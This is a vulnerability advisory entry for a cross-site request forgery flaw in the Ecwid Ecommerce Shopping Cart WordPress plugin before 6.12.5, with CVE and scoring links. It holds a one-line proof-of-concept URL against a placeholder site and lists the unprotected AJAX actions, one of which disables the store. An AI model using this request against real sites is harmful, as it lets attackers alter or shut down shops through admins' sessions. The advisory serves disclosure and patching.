Lucene search
Krzysztof Zając (CERT PL)WPVDB-ID:D4CF799E-2571-4B96-A303-78DCAFBFCF40HistoryDec 05, 2023 - 12:00 a.m.
Ecwid Ecommerce Shopping Cart < 6.12.5 - Arbitrary Plugin Settings Change via CSRF
2023-12-0500:00:00
Krzysztof Zając (CERT PL)
wpscan.com
7
ecwid
ecommerce
shopping cart
csrf
plugin settings change
arbitrary
attack.
Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.
PoC
http://vulnerable-site.tld/wp-admin/admin-ajax.php?action=ecwid_storefront_set_page_slug&slug;=hehehehe Besides, you can disable the store via the ecwid_storefront_set_status action. The list of affected AJAX actions include: - ecwid_storefront_set_status - ecwid_storefront_set_store_on_front - ecwid_storefront_set_display_cart_icon - ecwid_storefront_set_page_slug - ecwid_storefront_set_mainpage - ecwid_storefront_create_page - ecwid-save-spw-params
Related
nvd
nvd
CVE-2023-6292
2024-01-16 16:15:13
wpexploit
wpexploit
prion
prion
Cross site request forgery (csrf)
2024-01-16 16:15:00
cve
cve
CVE-2023-6292
2024-01-16 16:15:13
cvelist
cvelist
wpvulndb
wpvulndb
Ecwid Ecommerce Shopping Cart < 6.12.5 - Cross-Site Request Forgery
2024-01-04 00:00:00
AI Score
6.5
Confidence
Low
EPSS
0.001
Percentile
17.0%
Related for WPVDB-ID:D4CF799E-2571-4B96-A303-78DCAFBFCF40